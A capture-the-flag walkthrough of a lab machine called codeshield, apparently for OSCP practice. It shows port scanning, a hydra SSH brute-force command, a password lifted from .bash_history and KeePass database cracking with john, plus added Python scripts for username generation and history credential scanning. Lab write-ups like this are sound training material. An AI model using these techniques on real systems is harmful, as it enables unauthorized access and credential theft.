OSCP Lab
Lab overview
Machine | Difficulty | Skills covered
codeshield | easy | information gathering, password-list generation, hydra brute forcing, credential harvesting, kdbx file cracking, KeePassXC usage
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-03 05:15 EST
Nmap scan report for 192.168.1.100
Host is up (0.00082s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
443/tcp open ssl/http nginx
465/tcp open ssl/smtp Postfix smtpd
587/tcp open smtp Postfix smtpd
993/tcp open imaps?
995/tcp open pop3s?
2222/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3389/tcp open ms-wbt-server xrdp
22222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:61:49:1F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.30 seconds
Directory scan
dirb https://192.168.1.100
Gaining access
Download the PDF from the FTP service (vsftpd on port 21); the PDF contains a password.
Collect user names from the website to build a username wordlist, then brute-force the admin panel and SSH with it. Names found on the site:
angelina johnson
john doe
bob watson
jennifer cruise
kevin valdez
jessica carlson
mohammed mansour
xian tan
annabella cocci
thomas mitchell
patrick early
With the names collected, generate a username wordlist with this script:
https://github.com/w0Tx/generate-ad-username
Then brute-force SSH on port 22222 (the OpenSSH 8.9 listener from the scan) with the generated users and the password list:
hydra -L users.txt -P pass.txt ssh://192.168.1.100:22222
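The username-generation step, as an added example (not the generate-ad-username script linked above and not code from the write-up): it expands each full name through the common Linux/AD naming conventions and writes one candidate per line for `hydra -L`. The name list is the one gathered from the codeshield site; the pattern labels are my own. The three accounts reached later in the write-up (valdezk, mitchellt, earlyp) all follow the last-name-plus-first-initial form, and the john status line at the end of the page shows two further forms from such a list (carlson.jessica, moh-man).

```python
"""Build a username wordlist from the full names collected on the target site.

Added example (not the generate-ad-username script and not code from the
write-up). Output is one candidate per line, the format hydra -L expects.
"""

# Names collected from the target website (copied from the list above).
FULL_NAMES = [
    "angelina johnson", "john doe", "bob watson", "jennifer cruise",
    "kevin valdez", "jessica carlson", "mohammed mansour", "xian tan",
    "annabella cocci", "thomas mitchell", "patrick early",
]

# Common Linux/AD username conventions as (first, last) -> candidate.
# The labels are my own; comments show the output for one name.
PATTERNS = {
    "first.last": lambda f, l: f"{f}.{l}",          # jessica.carlson
    "last.first": lambda f, l: f"{l}.{f}",          # carlson.jessica
    "flast":      lambda f, l: f"{f[0]}{l}",        # kvaldez
    "lastf":      lambda f, l: f"{l}{f[0]}",        # valdezk (the form used on codeshield)
    "firstl":     lambda f, l: f"{f}{l[0]}",        # kevinv
    "first-last": lambda f, l: f"{f}-{l}",          # kevin-valdez
    "fir3-las3":  lambda f, l: f"{f[:3]}-{l[:3]}",  # moh-man
    "firstlast":  lambda f, l: f"{f}{l}",           # kevinvaldez
    "first":      lambda f, l: f,                   # kevin
    "last":       lambda f, l: l,                   # valdez
}


def split_name(full_name):
    """Return (first, last) in lower case; middle names are dropped."""
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        raise ValueError(f"need a first and a last name: {full_name!r}")
    return parts[0], parts[-1]


def generate_usernames(full_names, patterns=PATTERNS):
    """Expand every name through every pattern, de-duplicated, order kept."""
    seen = set()
    candidates = []
    for full_name in full_names:
        first, last = split_name(full_name)
        for make in patterns.values():
            user = make(first, last)
            if user not in seen:
                seen.add(user)
                candidates.append(user)
    return candidates


def write_wordlist(path, full_names):
    """Write the candidates one per line and return how many were written."""
    users = generate_usernames(full_names)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    count = write_wordlist("users.txt", FULL_NAMES)
    print(f"wrote {count} candidates to users.txt")
```

Eleven names through ten patterns give 110 candidates, small enough that hydra finishes quickly even against a rate-limited SSH daemon; add patterns rather than passwords if the first run finds nothing.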
Privilege escalation
A hidden directory in valdezk's home directory contains passwords.
Trying them one by one succeeds against the mitchellt account, which yields the first flag.
mitchellt's .bash_history contains earlyp's password (echoed into su on the command line); logging in with it succeeds.
mitchellt@codeshield:~$ cat .bash_history
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
cd mining/
ls
exit
mitchellt@codeshield:~$ su earlyp
Password:
earlyp@codeshield:/home/mitchellt$ ls
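The history check above done as a scan, as an added example that is not part of the write-up: it runs a few regexes for credentials typed onto the command line (the `echo 'pw' | su - user` shape found here, plus `sshpass -p` and `mysql -p<password>`) over a history file. The sample history is constructed; its first two lines copy the shape of the real .bash_history lines above, the rest are my own.

```python
"""Scan a shell history for credentials passed on the command line.

Added example, not from the write-up: it automates the check that found
earlyp's password in mitchellt's .bash_history. Run it on every readable
.bash_history / .zsh_history on the box after landing a shell.
"""
import re

# Each pattern captures a `user` and a `secret`; the labels are my own.
CRED_PATTERNS = {
    # echo 'pw' | su - user -c "..."   (the shape seen on codeshield)
    "echo|su": re.compile(
        r"""echo\s+(['"]?)(?P<secret>[^'"|]+?)\1\s*\|\s*su\s+(?:-\s+)?(?P<user>[\w.-]+)"""),
    # sshpass -p 'pw' ssh user@host
    "sshpass": re.compile(
        r"""sshpass\s+-p\s*(['"]?)(?P<secret>[^'"\s]+)\1.*?\s(?P<user>[\w.-]+)@"""),
    # mysql -u user -pSecret   (password glued to -p; a bare -p prompts and leaks nothing)
    "mysql -p": re.compile(
        r"""mysql\b.*?-u\s*(?P<user>[\w.-]+).*?-p(?P<secret>[^\s]+)"""),
}


def find_credentials(history_text):
    """Return (line_no, label, user, secret) for every history line that leaks one."""
    hits = []
    for line_no, line in enumerate(history_text.splitlines(), start=1):
        for label, pattern in CRED_PATTERNS.items():
            match = pattern.search(line)
            if match:
                hits.append((line_no, label, match.group("user"), match.group("secret")))
                break  # one finding per line is enough
    return hits


# Constructed sample: lines 1-2 mirror the real .bash_history above, the rest are made up.
SAMPLE_HISTORY = """\
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
sshpass -p 'Winter2023!' ssh backup@10.10.10.5
mysql -u app -pS3cretDbPw -h 127.0.0.1 appdb
exit
"""

if __name__ == "__main__":
    for line_no, label, user, secret in find_credentials(SAMPLE_HISTORY):
        print(f"line {line_no}: {label:8s} user={user} secret={secret}")
```

On the real file the scan returns the earlyp line twice, once per copy command; the `break` keeps one pattern from shadowing another on the same line but does not collapse repeats, which is deliberate, since the line number tells you when the credential was typed relative to the rest of the history.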
earlyp's Documents directory holds an encrypted kdbx (KeePass) database; download it to the attacking machine and crack the master password.
earlyp@codeshield:~/Documents$ ls -all
total 12
drwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .
drwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..
-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx
earlyp@codeshield:~/Documents$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.103 - - [03/Mar/2024 14:58:21] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [03/Mar/2024 14:58:25] "GET /Passwords.kdbx HTTP/1.1" 200 -
The wordlist built earlier is what cracks it. At about 2 candidates per second (the database uses over 3 million key-transform rounds, see the cost line below) a run over rockyou.txt is impractical, so the small targeted list is used instead.
┌──(root㉿kali)-[~/下载]
└─# keepass2john Passwords.kdbx > hash
┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=users.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 3225806 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mandalorian (Passwords)
1g 0:00:00:24 DONE (2024-03-03 10:09) 0.04110g/s 1.972p/s 1.972c/s 1.972C/s carlson.jessica..moh-man
Use the "--show" option to display all of the cracked passwords reliably
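Where john's three "Cost" lines come from, as an added example that is not from the write-up and is not keepass2john itself: a parser for the outer KDBX header, which is exactly what keepass2john reads to build the `$keepass$` hash. Knowing the transform-round count and cipher before starting tells you whether rockyou is feasible or a targeted list is required. The sample header is constructed: a KDBX 3.1 header carrying the 3,225,806 AES-KDF rounds john reported, with filler seeds; it is not the real Passwords.kdbx.

```python
"""Read the outer header of a KeePass 2 database (KDBX 3.x and 4.x).

Added example (not keepass2john, not code from the write-up). It reports the
fields john shows as costs: iteration count (3.x transform rounds), format
version, and the cipher algorithm code (0=AES, 1=Twofish, 2=ChaCha20).
"""
import struct
import uuid

SIG1 = 0x9AA2D903
SIG2_KDBX = 0xB54BFB67          # KeePass 2.x (KDBX); KeePass 1.x uses 0xB54BFB65

# Cipher UUIDs as stored in the header, mapped to (name, john "Cost 3" code).
CIPHERS = {
    uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff"): ("AES-256", 0),
    uuid.UUID("ad68f29f-576f-4bb9-a36a-d47af965346c"): ("Twofish", 1),
    uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a"): ("ChaCha20", 2),
}

# Outer header field IDs.
END_OF_HEADER, CIPHER_ID, COMPRESSION, MASTER_SEED = 0, 2, 3, 4
TRANSFORM_SEED, TRANSFORM_ROUNDS, ENCRYPTION_IV = 5, 6, 7   # KDBX 3.x only
KDF_PARAMETERS = 11                                          # KDBX 4.x only


def parse_kdbx_header(data):
    """Return version, cipher, john algorithm code and (for 3.x) the KDF rounds."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if sig1 != SIG1 or sig2 != SIG2_KDBX:
        raise ValueError("not a KeePass 2.x (KDBX) database")
    fields, off = {}, 12
    while True:
        fid = data[off]
        off += 1
        fmt = "<I" if major >= 4 else "<H"   # 4.x widened the length field
        (length,) = struct.unpack_from(fmt, data, off)
        off += struct.calcsize(fmt)
        fields[fid] = data[off:off + length]
        off += length
        if fid == END_OF_HEADER:
            break
    name, code = CIPHERS.get(uuid.UUID(bytes=fields[CIPHER_ID]), ("unknown", None))
    info = {"version": f"{major}.{minor}", "cipher": name,
            "john_algorithm": code, "header_length": off}
    if major >= 4:
        # Argon2 / AES-KDF settings live in a VariantDictionary (field 11).
        info["kdf_parameters_present"] = KDF_PARAMETERS in fields
    else:
        (info["transform_rounds"],) = struct.unpack("<Q", fields[TRANSFORM_ROUNDS])
    return info


def build_sample_kdbx3_header(rounds=3225806):
    """Constructed KDBX 3.1 header; seeds and IV are filler, not real values."""
    def field(fid, value):
        return bytes([fid]) + struct.pack("<H", len(value)) + value
    aes = next(u for u, (name, _) in CIPHERS.items() if name == "AES-256")
    return (struct.pack("<IIHH", SIG1, SIG2_KDBX, 1, 3)
            + field(CIPHER_ID, aes.bytes)
            + field(COMPRESSION, struct.pack("<I", 1))
            + field(MASTER_SEED, b"\x11" * 32)
            + field(TRANSFORM_SEED, b"\x22" * 32)
            + field(TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
            + field(ENCRYPTION_IV, b"\x33" * 16)
            + field(END_OF_HEADER, b"\r\n\r\n"))


def crack_time_seconds(candidates, rate_per_second):
    """Wall-clock estimate for a wordlist at the p/s rate john reports."""
    return candidates / rate_per_second


if __name__ == "__main__":
    print(parse_kdbx_header(build_sample_kdbx3_header()))
    # rockyou.txt is commonly counted at 14,344,391 lines; at the 1.972 p/s
    # john showed above that is roughly 84 days, hence the targeted list.
    days = crack_time_seconds(14_344_391, 1.972) / 86400
    print(f"rockyou at 1.972 p/s: about {days:.0f} days")
```

Run `parse_kdbx_header(open("Passwords.kdbx", "rb").read())` on a real file; a 4.x database with Argon2 parameters will crack far slower per candidate than the AES-KDF figure above, so check the version first.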
With the master password recovered, open the database to read the root login password. One option is the browser-based KeeWeb:
https://app.keeweb.info
The database can also be opened locally with KeePassXC (or its keepassxc-cli), which keeps the loot on your own machine.
End
Originally published on the WeChat public account (贝雷帽SEC): 【OSCP】codeshield